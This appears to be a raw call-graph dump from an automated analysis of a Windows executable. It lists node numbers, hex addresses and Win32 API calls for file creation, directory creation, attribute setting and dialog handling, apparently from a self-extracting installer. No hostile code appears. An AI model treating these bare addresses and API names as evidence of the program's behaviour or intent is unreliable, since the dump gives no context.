SetCurrentDirectoryW 28467->28469 28468->28469 28469->28316 28471 243280 28470->28471 28822 242f0f 28471->28822 28474 265734 __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 28475 24329d 28474->28475 28476 242f45 28475->28476 28477 242f55 _wcslen 28476->28477 28826 245962 28477->28826 28479 242f63 28479->28355 28482 24dea6 __EH_prolog3_GS 28480->28482 28481 24def4 28484 25169a 47 API calls 28481->28484 28491 24df9e 28481->28491 28482->28481 28483 24df09 CreateFileW 28482->28483 28483->28481 28485 24df49 28484->28485 28488 24df56 28485->28488 28489 24df59 CreateFileW 28485->28489 28490 24df6e 28485->28490 28486 265787 5 API calls 28487 24dfdf 28486->28487 28487->28374 28487->28375 28488->28489 28489->28490 28490->28491 28835 2419a9 26 API calls 28490->28835 28491->28486 28494 24de09 28493->28494 28495 24ddf8 28493->28495 28496 241a66 26 API calls 28494->28496 28495->28494 28497 24de04 28495->28497 28498 24de0b 28495->28498 28499 24de18 28496->28499 28836 24dfe2 28497->28836 28841 24de50 28498->28841 28499->28387 28502->28339 28503->28351 28505 254328 28504->28505 28862 254349 28505->28862 28508 241e1f GetDlgItem ShowWindow 28508->28366 28526 261d5e __EH_prolog3_GS 28509->28526 28511 26349a 28512 241a66 26 API calls 28511->28512 28513 2634a5 28512->28513 28514 265787 5 API calls 28513->28514 28515 2610c5 28514->28515 28515->28379 28516 24769f 45 API calls 28516->28526 28517 2425a4 26 API calls 28517->28526 28519 2414a7 28 API calls 28519->28526 28520 241a66 26 API calls 28520->28526 28521 25645a 28 API calls 28521->28526 28524 2634ad 28894 2458cb 45 API calls 28524->28894 28526->28511 28526->28516 28526->28517 28526->28519 28526->28520 28526->28521 28526->28524 28889 2562cd 30 API calls 2 library calls 28526->28889 28890 25f5b2 28 API calls 28526->28890 28891 24adaa CompareStringW 28526->28891 28892 2644c0 26 API calls 28526->28892 28893 26030a 28 API calls 28526->28893 28540 263c87 __EH_prolog3_catch_GS _wcslen 28539->28540 28895 256a89 28540->28895 28542 263cba 28899 247903 28542->28899 28551 265796 5 API calls 28552 2610e0 28551->28552 28552->28393 29806 25eaa6 28553->29806 28556 2637bf GetWindow 28557 263885 28556->28557 28562 2637d8 28556->28562 28558 265734 __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 28557->28558 28559 261266 28558->28559 28559->28204 28559->28205 28560 2637e5 GetClassNameW 29811 258da4 CompareStringW 28560->29811 28562->28557 28562->28560 28563 26386d GetWindow 28562->28563 28564 263809 GetWindowLongW 28562->28564 28565 26382f GetObjectW 28562->28565 28563->28557 28563->28562 28564->28562 28564->28563 29812 25eae5 GetDC GetDeviceCaps GetDeviceCaps ReleaseDC 28565->29812 28569 263846 28570 263866 DeleteObject 28569->28570 29813 25eac4 GetDC GetDeviceCaps GetDeviceCaps ReleaseDC 28569->29813 29814 25ef21 13 API calls __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 28569->29814 28570->28563 29817 2657a5 28571->29817 28573 251315 GetCurrentDirectoryW 28574 251327 28573->28574 28577 251323 28573->28577 29818 241bbd 28 API calls 28574->29818 28576 251339 GetCurrentDirectoryW 28578 251356 _wcslen 28576->28578 28577->28219 28578->28577 28579 2412a7 26 API calls 28578->28579 28579->28577 28581 241e11 SetWindowTextW 28580->28581 28582 241e0f 28580->28582 28581->28231 28582->28581 28584 25f31e 28583->28584 28585 25f2f9 28583->28585 28587 265734 __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 28584->28587 29819 258da4 CompareStringW 28585->29819 28589 25f337 28587->28589 28588 25f30c 28588->28584 28590 25f310 FindWindowExW 28588->28590 28591 25fdd1 28589->28591 28590->28584 28592 25fded 28591->28592 28593 2420b0 30 API calls 28592->28593 28594 25fe27 28593->28594 29820 242dbb 28594->29820 28597 25fe43 28599 24232c 114 API calls 28597->28599 28598 25fe4c 29827 24278b 28598->29827 28601 25fe48 28599->28601 28604 265734 __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 28601->28604 28603 24232c 114 API calls 28603->28601 28605 25fe77 28604->28605 28605->28257 28605->28260 28606->28220 28608 241df1 28607->28608 28609 241df3 SetDlgItemTextW 28607->28609 28608->28609 28609->28223 28610->28229 28612 265734 __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 28611->28612 28613 2657a0 28612->28613 28613->28613 28615 2414bd _wcslen 28614->28615 28616 24120c 28 API calls 28615->28616 28617 2414ca 28616->28617 28618 263572 28617->28618 29911 260678 PeekMessageW 28618->29911 28621 2635ac 28622 2635b7 ShowWindow 28621->28622 28623 2635cf 28622->28623 28624 265734 __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 28623->28624 28625 2636c0 28624->28625 28625->28254 28627 24768c 28626->28627 29916 247430 28627->29916 28629 247699 28630 2634eb 28 API calls __EH_prolog3_GS 28629->28630 28630->28250 29928 2568d4 28631->29928 28634->28273 28636 24ed1f 49 API calls 28635->28636 28637 24ed16 28636->28637 28637->28282 28637->28306 28638->28282 28640 251405 __EH_prolog3 28639->28640 28641 2656f6 28 API calls 28640->28641 28642 25140f 28641->28642 28643 251431 GetModuleFileNameW 28642->28643 28644 251463 28642->28644 28645 241be3 28 API calls 28642->28645 28643->28642 28643->28644 28646 2414a7 28 API calls 28644->28646 28645->28642 28647 25146c 28646->28647 28648 25147f 28647->28648 28649 2412a7 26 API calls 28647->28649 28648->28349 28649->28648 28650->28358 28651->28389 28652->28395 28653->28400 28654->28406 28655->28410 28657 242e93 28656->28657 28658 242ea0 28656->28658 28659 2412a7 26 API calls 28657->28659 28658->28425 28659->28658 28660->28348 28661->28405 28662->28315 28663->28289 28664->28317 28665->28297 28666->28305 28667->28435 28668->28433 28669->28441 28684 2657d8 28670->28684 28672 241d70 GetWindowTextLengthW 28685 241bbd 28 API calls 28672->28685 28674 241dab GetWindowTextW 28675 2414a7 28 API calls 28674->28675 28676 241dca 28675->28676 28677 241ddd 28676->28677 28686 2412a7 28676->28686 28679 265787 5 API calls 28677->28679 28680 241de4 28679->28680 28680->28446 28691 265734 28681->28691 28683 241d61 28683->28212 28683->28215 28683->28405 28684->28672 28685->28674 28687 2412c1 28686->28687 28688 2412b4 28686->28688 28687->28677 28690 2419a9 26 API calls 28688->28690 28690->28687 28692 26573c 28691->28692 28693 26573d IsProcessorFeaturePresent 28691->28693 28692->28683 28695 265bfc 28693->28695 28698 265bbf SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 28695->28698 28697 265cdf 28697->28683 28698->28697 28700 2476e1 28699->28700 28701 2476bb 28699->28701 28734 2458cb 45 API calls 28700->28734 28725 24120c 28701->28725 28705 2476db 28705->28459 28708 24effb __EH_prolog3_GS 28706->28708 28707 24f02f 28710 24ed0d 49 API calls 28707->28710 28708->28707 28709 24f01b CreateDirectoryW 28708->28709 28709->28707 28711 24f0d0 28709->28711 28712 24f03b 28710->28712 28713 24f0df 28711->28713 28738 24f58b 28711->28738 28714 24f0e3 GetLastError 28712->28714 28751 25169a 28712->28751 28718 265787 5 API calls 28713->28718 28714->28713 28719 24f100 28718->28719 28719->28459 28720 24f07d 28724 24f0ad 28720->28724 28808 2419a9 26 API calls 28720->28808 28721 24f070 28722 24f073 CreateDirectoryW 28721->28722 28722->28720 28724->28711 28724->28714 28726 24127d 28725->28726 28729 24121d 28725->28729 28737 241a92 28 API calls 28726->28737 28733 241228 28729->28733 28735 2412d3 28 API calls Concurrency::cancel_current_task 28729->28735 28731 241254 28736 2411b8 28 API calls 28731->28736 28733->28705 28735->28731 28736->28733 28739 24f597 __EH_prolog3_GS 28738->28739 28740 24f5a4 SetFileAttributesW 28739->28740 28741 24f5b7 28740->28741 28749 24f622 28740->28749 28742 25169a 47 API calls 28741->28742 28744 24f5d7 28742->28744 28743 265787 5 API calls 28745 24f638 28743->28745 28746 24f5f6 28744->28746 28747 24f5e4 28744->28747 28748 24f5e7 SetFileAttributesW 28744->28748 28745->28713 28746->28749 28809 2419a9 26 API calls 28746->28809 28747->28748 28748->28746 28749->28743 28752 2516e7 28751->28752 28766 2516e0 28751->28766 28753 2414a7 28 API calls 28752->28753 28756 2516f4 28753->28756 28754 265734 __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 28755 24f063 28754->28755 28755->28720 28755->28721 28755->28722 28757 251711 28756->28757 28758 2517db 28756->28758 28760 25171b 28757->28760 28767 251741 28757->28767 28759 251309 30 API calls 28758->28759 28765 2517fb 28759->28765 28810 250ba6 28 API calls 28760->28810 28761 2518ed 28773 251739 28761->28773 28821 2419a9 26 API calls 28761->28821 28763 241a66 26 API calls 28763->28766 28764 251729 28811 2425a4 28764->28811 28765->28761 28771 251875 28765->28771 28772 25181f 28765->28772 28766->28754 28767->28773 28778 24769f 45 API calls 28767->28778 28770 251731 28774 241a66 26 API calls 28770->28774 28819 250ba6 28 API calls 28771->28819 28817 250c41 28 API calls 28772->28817 28773->28763 28774->28773 28776 251883 28779 2425a4 26 API calls 28776->28779 28781 251789 28778->28781 28782 25188c 28779->28782 28780 251838 28818 241188 28 API calls 28780->28818 28815 250bf3 28 API calls _wcslen 28781->28815 28785 241a66 26 API calls 28782->28785 28788 251894 28785->28788 28786 251848 28793 2425a4 26 API calls 28786->28793 28787 25179e 28816 24aef3 28 API calls 28787->28816 28820 250ddb 28 API calls 28788->28820 28790 2517b2 28792 2425a4 26 API calls 28790->28792 28794 2517be 28792->28794 28795 251860 28793->28795 28796 241a66 26 API calls 28794->28796 28797 241a66 26 API calls 28795->28797 28799 2517c6 28796->28799 28801 251868 28797->28801 28798 24769f 45 API calls 28805 251870 28798->28805 28802 241a66 26 API calls 28799->28802 28800 25189c 28800->28798 28803 241a66 26 API calls 28801->28803 28804 2517ce 28802->28804 28803->28805 28806 241a66 26 API calls 28804->28806 28807 241a66 26 API calls 28805->28807 28806->28773 28807->28761 28808->28724 28809->28749 28810->28764 28812 2425b2 28811->28812 28813 2425ad 28811->28813 28812->28770 28814 241a66 26 API calls 28813->28814 28814->28812 28815->28787 28816->28790 28817->28780 28818->28786 28819->28776 28820->28800 28821->28773 28823 242f26 28822->28823 28824 242f2f 28822->28824 28823->28474 28825 24120c 28 API calls 28824->28825 28825->28823 28827 245975 28826->28827 28828 245a3a 28826->28828 28830 245987 28827->28830 28833 243029 28 API calls 28827->28833 28834 2458cb 45 API calls 28828->28834 28830->28479 28833->28830 28835->28491 28837 24e015 28836->28837 28838 24dfeb 28836->28838 28837->28494 28838->28837 28847 24ec63 28838->28847 28842 24de5c 28841->28842 28843 24de76 28841->28843 28842->28843 28845 24de68 CloseHandle 28842->28845 28844 24de95 28843->28844 28861 24925b 100 API calls 28843->28861 28844->28494 28845->28843 28848 24ec6f __EH_prolog3_GS 28847->28848 28849 24ec7c DeleteFileW 28848->28849 28850 24ec8c 28849->28850 28858 24ecf4 28849->28858 28852 25169a 47 API calls 28850->28852 28851 265787 5 API calls 28853 24e013 28851->28853 28854 24ecac 28852->28854 28853->28494 28855 24ecc8 28854->28855 28856 24ecbc DeleteFileW 28854->28856 28857 24ecb9 28854->28857 28855->28858 28860 2419a9 26 API calls 28855->28860 28856->28855 28857->28856 28858->28851 28860->28858 28861->28844 28868 25347b 28862->28868 28865 254346 SetDlgItemTextW 28865->28508 28866 25436c LoadStringW 28866->28865 28867 254383 LoadStringW 28866->28867 28867->28865 28875 25338e 28868->28875 28871 2534bc 28873 265734 __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 28871->28873 28874 2534d1 28873->28874 28874->28865 28874->28866 28876 2533c2 28875->28876 28884 253445 _strncpy 28875->28884 28880 2533e2 28876->28880 28886 2589ed WideCharToMultiByte 28876->28886 28878 265734 __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 28879 253474 28878->28879 28879->28871 28885 2534d5 26 API calls 28879->28885 28883 253413 28880->28883 28887 2542b2 50 API calls __vsnprintf 28880->28887 28888 26d097 26 API calls 3 library calls 28883->28888 28884->28878 28885->28871 28886->28880 28887->28883 28888->28884 28889->28526 28890->28526 28891->28526 28892->28526 28893->28526 28896 256a99 _wcslen 28895->28896 28950 241be3 28896->28950 28898 256abb 28898->28542 28900 256a74 28899->28900 28901 256a89 28 API calls 28900->28901 28902 256a86 28901->28902 28903 24b03d 28902->28903 28904 24b049 __EH_prolog3_GS 28903->28904 28955 252815 28904->28955 28906 24b092 28961 24b231 28906->28961 28909 241a66 26 API calls 28910 24b120 28909->28910 28911 241a66 26 API calls 28910->28911 28912 24b128 28911->28912 28966 2656f6 28912->28966 28914 24b13f 28980 25a599 28914->28980 28916 24b172 28917 265787 5 API calls 28916->28917 28918 24b179 28917->28918 28919 24b3e1 28918->28919 28920 24b3ed __EH_prolog3_GS 28919->28920 28921 24b478 28920->28921 28924 24b484 28920->28924 29030 24f711 28920->29030 28922 241a66 26 API calls 28921->28922 28922->28924 28929 24b4e0 28924->28929 28997 24bc65 28924->28997 28925 24b529 28926 265787 5 API calls 28925->28926 28928 24b543 28926->28928 28931 24b194 28928->28931 28929->28925 29037 24204b 80 API calls __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 28929->29037 29750 24d6bc 28931->29750 28935 241a66 26 API calls 28937 24b1e8 28935->28937 28936 24b1d0 28936->28935 28938 241a66 26 API calls 28937->28938 28939 24b1f3 28938->28939 28940 241a66 26 API calls 28939->28940 28941 24b1fe 28940->28941 29764 2528aa 28941->29764 28943 24b206 28944 241a66 26 API calls 28943->28944 28945 24b20e 28944->28945 28946 241a66 26 API calls 28945->28946 28947 24b216 28946->28947 28948 24d869 26 API calls 28947->28948 28949 24b21d 28948->28949 28949->28551 28951 241c03 28950->28951 28952 241bfb 28950->28952 28951->28952 28954 241c33 28 API calls 28951->28954 28952->28898 28954->28952 28956 252821 __EH_prolog3 28955->28956 28957 2656f6 28 API calls 28956->28957 28958 25285f 28957->28958 28959 2656f6 28 API calls 28958->28959 28960 252883 28959->28960 28960->28906 28962 2425a4 26 API calls 28961->28962 28963 24b23f 28962->28963 28964 2425a4 26 API calls 28963->28964 28965 24b118 28964->28965 28965->28909 28969 2656fb 28966->28969 28968 265715 28968->28914 28969->28968 28971 265717 28969->28971 28986 26d08c 28969->28986 28993 26e91a 7 API calls 2 library calls 28969->28993 28972 241a25 Concurrency::cancel_current_task 28971->28972 28974 265721 28971->28974 28973 26734a CallUnexpected RaiseException 28972->28973 28975 241a41 28973->28975 28976 26734a CallUnexpected RaiseException 28974->28976 28978 241a5a 28975->28978 28979 2412a7 26 API calls 28975->28979 28977 266628 28976->28977 28978->28914 28979->28978 28981 25a5a5 __EH_prolog3 28980->28981 28982 2656f6 28 API calls 28981->28982 28983 25a5bf 28982->28983 28985 25a5d6 28983->28985 28996 257445 103 API calls 28983->28996 28985->28916 28992 27040e _unexpected 28986->28992 28987 27044c 28995 2701d3 20 API calls _abort 28987->28995 28989 270437 RtlAllocateHeap 28990 27044a 28989->28990 28989->28992 28990->28969 28992->28987 28992->28989 28994 26e91a 7 API calls 2 library calls 28992->28994 28993->28969 28994->28992 28995->28990 28996->28985 28998 24bc80 28997->28998 29038 2420b0 28998->29038 29000 24bca7 29001 24bcba 29000->29001 29260 24e910 29000->29260 29007 24bcec 29001->29007 29048 2427e0 29001->29048 29004 24bce8 29004->29007 29072 242d41 151 API calls __EH_prolog3_GS 29004->29072 29237 24232c 29007->29237 29010 24bd14 29012 24be08 29010->29012 29013 247673 28 API calls 29010->29013 29073 24bec2 7 API calls 29012->29073 29015 24bd36 29013->29015 29264 251e54 46 API calls 2 library calls 29015->29264 29017 24f711 53 API calls 29027 24bd53 29017->29027 29018 24be16 29019 24be76 29018->29019 29074 25864f 29018->29074 29019->29007 29077 2452d8 29019->29077 29089 24bf3d 29019->29089 29020 24bde8 29023 241a66 26 API calls 29020->29023 29025 24bded 29023->29025 29024 241a66 26 API calls 29024->29027 29028 241a66 26 API calls 29025->29028 29027->29017 29027->29020 29027->29024 29265 251e54 46 API calls 2 library calls 29027->29265 29028->29012 29031 251a9f 5 API calls 29030->29031 29032 24f723 29031->29032 29033 24f74b 29032->29033 29708 24f826 29032->29708 29033->28920 29036 24f738 FindClose 29036->29033 29037->28925 29039 2420bc __EH_prolog3 29038->29039 29040 252815 28 API calls 29039->29040 29041 2420e8 29040->29041 29042 2656f6 28 API calls 29041->29042 29045 242193 29041->29045 29044 242180 29042->29044 29044->29045 29046 2476e7 30 API calls 29044->29046 29266 25026f 29045->29266 29046->29045 29047 242227 __cftof 29047->29000 29049 2427ec __EH_prolog3 29048->29049 29054 242838 29049->29054 29069 24298b 29049->29069 29277 2411dd 29049->29277 29051 2429a9 29295 24204b 80 API calls __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 29051->29295 29053 2452d8 124 API calls 29059 2429f4 29053->29059 29054->29051 29056 2429b6 29054->29056 29055 242882 29286 24e850 29055->29286 29056->29053 29056->29069 29057 242a3c 29061 242a6f 29057->29061 29057->29069 29296 24204b 80 API calls __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 29057->29296 29059->29057 29060 2452d8 124 API calls 29059->29060 29060->29059 29061->29069 29071 24e850 102 API calls 29061->29071 29062 242995 29064 242e8b 26 API calls 29062->29064 29063 242986 29065 242e8b 26 API calls 29063->29065 29064->29054 29065->29069 29066 2428ad 29066->29062 29066->29063 29067 2452d8 124 API calls 29068 242ac0 29067->29068 29068->29067 29068->29069 29069->29004 29071->29068 29072->29010 29073->29018 29301 264300 29074->29301 29078 2452e4 29077->29078 29079 2452e8 29077->29079 29078->29019 29088 24e850 102 API calls 29079->29088 29080 2452fa 29081 245315 29080->29081 29082 245323 29080->29082 29084 245355 29081->29084 29331 2448aa 109 API calls 2 library calls 29081->29331 29332 243d9d 122 API calls 3 library calls 29082->29332 29084->29019 29086 245321 29086->29084 29333 24344b 80 API calls 29086->29333 29088->29080 29090 24bf95 29089->29090 29095 24bfc4 29090->29095 29158 24c2fd 29090->29158 29431 25cdb4 126 API calls __EH_prolog3_GS 29090->29431 29092 24d2e5 29093 24d331 29092->29093 29094 24d2ea 29092->29094 29093->29158 29503 25cdb4 126 API calls __EH_prolog3_GS 29093->29503 29094->29158 29502 24ab88 176 API calls 29094->29502 29095->29092 29100 24bfeb 29095->29100 29095->29158 29096 265734 __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 29097 24d327 29096->29097 29097->29019 29100->29158 29334 247e1b 29100->29334 29102 24c0c8 29346 25106b 29102->29346 29106 24c151 29109 24c16f 29106->29109 29433 252095 45 API calls __EH_prolog3_GS 29106->29433 29108 24c269 29115 24c29b 29108->29115 29434 2419a9 26 API calls 29108->29434 29136 24c239 29109->29136 29436 250ddb 28 API calls 29109->29436 29111 24c374 29112 24d205 29111->29112 29116 24c3cf 29111->29116 29117 24c3ea 29111->29117 29113 24c948 29112->29113 29152 24c743 29112->29152 29126 24c97a 29113->29126 29469 2419a9 26 API calls 29113->29469 29115->29158 29435 2419a9 26 API calls 29115->29435 29120 241a66 26 API calls 29116->29120 29131 24c409 29117->29131 29438 24b92d 56 API calls __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 29117->29438 29125 24c3da 29120->29125 29122 24d276 29122->29158 29501 2419a9 26 API calls 29122->29501 29128 241a66 26 API calls 29125->29128 29126->29158 29470 2419a9 26 API calls 29126->29470 29128->29158 29129 24c33d _wcslen 29437 24f103 52 API calls 2 library calls 29129->29437 29130 24c4ea 29356 24b2ee 29130->29356 29131->29130 29132 24f711 53 API calls 29131->29132 29144 24c49b 29132->29144 29136->29108 29136->29111 29137 24c5c2 29138 24c7d8 29137->29138 29142 24c5cf 29137->29142 29447 252a36 106 API calls 29138->29447 29140 241a66 26 API calls 29140->29130 29143 24c62c 29142->29143 29441 2457c0 28 API calls 2 library calls 29142->29441 29147 24c781 29143->29147 29143->29152 29176 24c77a 29143->29176 29442 24b015 28 API calls 29143->29442 29443 252a36 106 API calls 29143->29443 29444 2432d2 80 API calls __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 29143->29444 29445 24b8ed 80 API calls 29143->29445 29144->29140 29146 24c501 29153 24c551 29146->29153 29439 2419a9 26 API calls 29146->29439 29151 24c830 29147->29151 29448 24ede9 110 API calls __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 29147->29448 29150 24c8f0 29159 24c9eb 29150->29159 29165 24c8ff 29150->29165 29151->29150 29155 24c859 29151->29155 29152->29122 29500 2419a9 26 API calls 29152->29500 29153->29158 29440 2419a9 26 API calls 29153->29440 29162 24ca64 29155->29162 29167 24ed0d 49 API calls 29155->29167 29183 24c874 29155->29183 29158->29096 29159->29183 29362 24b345 29159->29362 29160 24c940 29163 24ddc7 105 API calls 29160->29163 29166 24d1f2 29162->29166 29189 24cac5 29162->29189 29471 24e152 29162->29471 29163->29113 29164 24ca01 29168 24ca05 29164->29168 29368 24b778 29164->29368 29165->29160 29468 24b544 135 API calls __EH_prolog3_GS 29165->29468 29169 24ddc7 105 API calls 29166->29169 29170 24c8b3 29167->29170 29171 24ddc7 105 API calls 29168->29171 29169->29112 29170->29183 29449 24d8b8 29170->29449 29171->29152 29175 24cb15 29181 24fd70 28 API calls 29175->29181 29446 2432d2 80 API calls __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 29176->29446 29178 24b345 81 API calls 29184 24ca5e 29178->29184 29204 24cb2f 29181->29204 29183->29162 29183->29168 29183->29178 29184->29162 29184->29168 29187 24cab7 29475 249653 100 API calls 29187->29475 29398 24fd70 29189->29398 29190 24cc21 29191 24cc76 29190->29191 29192 24cf27 29190->29192 29193 24cd33 29191->29193 29194 24cc94 29191->29194 29195 24cf50 29192->29195 29196 24cf39 29192->29196 29220 24ccb5 29192->29220 29479 2522b9 28 API calls 29193->29479 29199 24ccd8 29194->29199 29207 24cca3 29194->29207 29402 259625 29195->29402 29486 24d771 29196->29486 29198 24cd69 29202 25106b 45 API calls 29198->29202 29199->29220 29478 24a7a2 133 API calls 29199->29478 29205 24cd76 29202->29205 29203 24cf73 29418 2594ea 29203->29418 29204->29190 29476 24e39d 8 API calls 29204->29476 29480 24b92d 56 API calls __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 29205->29480 29477 2432d2 80 API calls __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 29207->29477 29213 24cdaf 29214 24cddd 29213->29214 29215 24cdcd 29213->29215 29216 24cddf 29213->29216 29221 24ce3e 29214->29221 29483 2419a9 26 API calls 29214->29483 29481 24a496 110 API calls 29215->29481 29482 24d3d7 126 API calls __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 29216->29482 29223 24cf15 29220->29223 29485 24fd28 5 API calls __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 29220->29485 29221->29220 29484 2419a9 26 API calls 29221->29484 29226 24d044 29223->29226 29497 2432d2 80 API calls __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 29223->29497 29225 24d115 29426 24e772 29225->29426 29226->29166 29226->29225 29230 24d161 29226->29230 29425 24e8d9 SetEndOfFile 29226->29425 29229 24d159 29231 24de50 101 API calls 29229->29231 29230->29166 29232 24f58b 49 API calls 29230->29232 29231->29230 29233 24d1d2 29232->29233 29233->29166 29498 2432d2 80 API calls __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 29233->29498 29235 24d1e8 29499 249500 100 API calls __EH_prolog3_GS 29235->29499 29238 242350 29237->29238 29239 24233e 29237->29239 29240 241a66 26 API calls 29238->29240 29239->29238 29704 2423b0 26 API calls 29239->29704 29242 242369 29240->29242 29705 242ed0 26 API calls 29242->29705 29244 242374 29706 2424d9 26 API calls 29244->29706 29261 24e927 29260->29261 29262 24e931 29261->29262 29707 2493d7 101 API calls __EH_prolog3_GS 29261->29707 29262->29001 29264->29027 29265->29027 29267 25028f __cftof 29266->29267 29274 250152 29267->29274 29270 241a66 26 API calls 29271 2502b4 29270->29271 29272 265734 __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 29271->29272 29273 2502bf 29272->29273 29273->29047 29275 2425a4 26 API calls 29274->29275 29276 2501c7 29275->29276 29276->29270 29278 241206 29277->29278 29279 2411e8 29277->29279 29298 241a25 27 API calls 2 library calls 29278->29298 29280 2656f6 28 API calls 29279->29280 29282 2411ee 29280->29282 29284 2411f5 29282->29284 29297 26ac9e 26 API calls _abort 29282->29297 29283 24120b 29284->29055 29287 24e875 29286->29287 29288 24e862 29286->29288 29289 24e880 29287->29289 29291 24e888 SetFilePointer 29287->29291 29288->29289 29299 249490 100 API calls 29288->29299 29289->29066 29291->29289 29292 24e8a4 GetLastError 29291->29292 29292->29289 29293 24e8ae 29292->29293 29293->29289 29300 249490 100 API calls 29293->29300 29295->29069 29296->29061 29298->29283 29299->29287 29300->29289 29302 26430c __EH_prolog3_GS 29301->29302 29317 252117 29302->29317 29305 254318 53 API calls 29306 264342 29305->29306 29307 256a25 53 API calls 29306->29307 29308 26434c 29307->29308 29309 241a66 26 API calls 29308->29309 29310 26435b 29309->29310 29321 263ec5 29310->29321 29313 241a66 26 API calls 29314 264375 29313->29314 29315 265787 5 API calls 29314->29315 29316 258665 29315->29316 29316->29019 29318 252124 29317->29318 29319 24769f 45 API calls 29318->29319 29320 252136 29319->29320 29320->29305 29322 263ed1 __EH_prolog3_GS 29321->29322 29323 2414a7 28 API calls 29322->29323 29324 263edd 29323->29324 29325 263572 12 API calls 29324->29325 29326 263eec 29325->29326 29327 241a66 26 API calls 29326->29327 29328 263ef4 29327->29328 29329 265787 5 API calls 29328->29329 29330 263ef9 29329->29330 29330->29313 29331->29086 29332->29086 29333->29084 29335 247e27 __EH_prolog3_GS 29334->29335 29504 247bfc 29335->29504 29337 247e6c 29338 265787 5 API calls 29337->29338 29339 247ecf 29338->29339 29339->29102 29340 247e68 29340->29337 29343 247ed2 29340->29343 29345 247ebe 29340->29345 29509 247bd6 30 API calls 29340->29509 29342 241a66 26 API calls 29342->29337 29343->29345 29510 24adaa CompareStringW 29343->29510 29345->29342 29355 251095 29346->29355 29347 251256 29349 265734 __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 29347->29349 29348 24769f 45 API calls 29350 251241 29348->29350 29351 24c11b 29349->29351 29352 2425a4 26 API calls 29350->29352 29351->29109 29432 252095 45 API calls __EH_prolog3_GS 29351->29432 29353 25124d 29352->29353 29354 241a66 26 API calls 29353->29354 29354->29347 29355->29347 29355->29348 29357 24b303 29356->29357 29358 24b33b 29357->29358 29553 249635 80 API calls 29357->29553 29358->29137 29358->29146 29360 24b333 29554 24204b 80 API calls __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 29360->29554 29363 24b368 29362->29363 29365 24b39e 29362->29365 29363->29365 29555 2585fd 66 API calls 29363->29555 29365->29164 29366 24b39a 29366->29365 29556 2432a1 80 API calls __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 29366->29556 29369 24b784 __EH_prolog3_GS 29368->29369 29370 24b8e3 29369->29370 29372 24d8b8 129 API calls 29369->29372 29371 265787 5 API calls 29370->29371 29373 24b8ea 29371->29373 29374 24b7ef 29372->29374 29373->29183 29374->29370 29557 249283 100 API calls 29374->29557 29376 24b817 29377 24ed0d 49 API calls 29376->29377 29378 24b81d 29377->29378 29379 24b838 29378->29379 29558 24ed1f 29378->29558 29571 251a27 IsProcessorFeaturePresent SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 29379->29571 29382 24b83e 29382->29370 29572 24204b 80 API calls __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 29382->29572 29383 24b827 29383->29379 29570 2432a1 80 API calls __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 29383->29570 29385 24b850 29386 247673 28 API calls 29385->29386 29388 24b859 29386->29388 29389 24b88d 29388->29389 29573 24ede9 110 API calls __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 29388->29573 29390 24eaf3 54 API calls 29389->29390 29394 24b8c9 29389->29394 29392 24b8a1 29390->29392 29393 24d8b8 129 API calls 29392->29393 29395 24b8c5 29393->29395 29396 241a66 26 API calls 29394->29396 29395->29394 29574 249283 100 API calls 29395->29574 29396->29370 29399 24fd7e 29398->29399 29401 24fd88 29398->29401 29400 2656f6 28 API calls 29399->29400 29400->29401 29401->29175 29403 259639 29402->29403 29404 25975f 29403->29404 29407 259644 29403->29407 29406 26734a CallUnexpected RaiseException 29404->29406 29405 259739 29405->29203 29412 25970b 29406->29412 29407->29405 29408 2596ed 29407->29408 29410 26d08c ___std_exception_copy 21 API calls 29407->29410 29407->29412 29408->29405 29411 25971f 29408->29411 29408->29412 29409 26734a CallUnexpected RaiseException 29416 2597a3 __EH_prolog3 __cftof 29409->29416 29410->29408 29411->29405 29576 259556 80 API calls 4 library calls 29411->29576 29412->29409 29414 259896 29414->29203 29415 26d08c ___std_exception_copy 21 API calls 29415->29416 29416->29414 29416->29415 29577 249384 80 API calls 29416->29577 29419 2594f3 29418->29419 29420 25951d 29419->29420 29421 25951f 29419->29421 29422 259515 29419->29422 29420->29220 29593 25abc8 146 API calls 29421->29593 29578 25b76f 29422->29578 29425->29225 29427 24e783 29426->29427 29429 24e792 29426->29429 29428 24e789 FlushFileBuffers 29427->29428 29427->29429 29428->29429 29430 24e80f SetFileTime 29429->29430 29430->29229 29431->29095 29432->29106 29433->29109 29434->29115 29435->29158 29436->29129 29437->29136 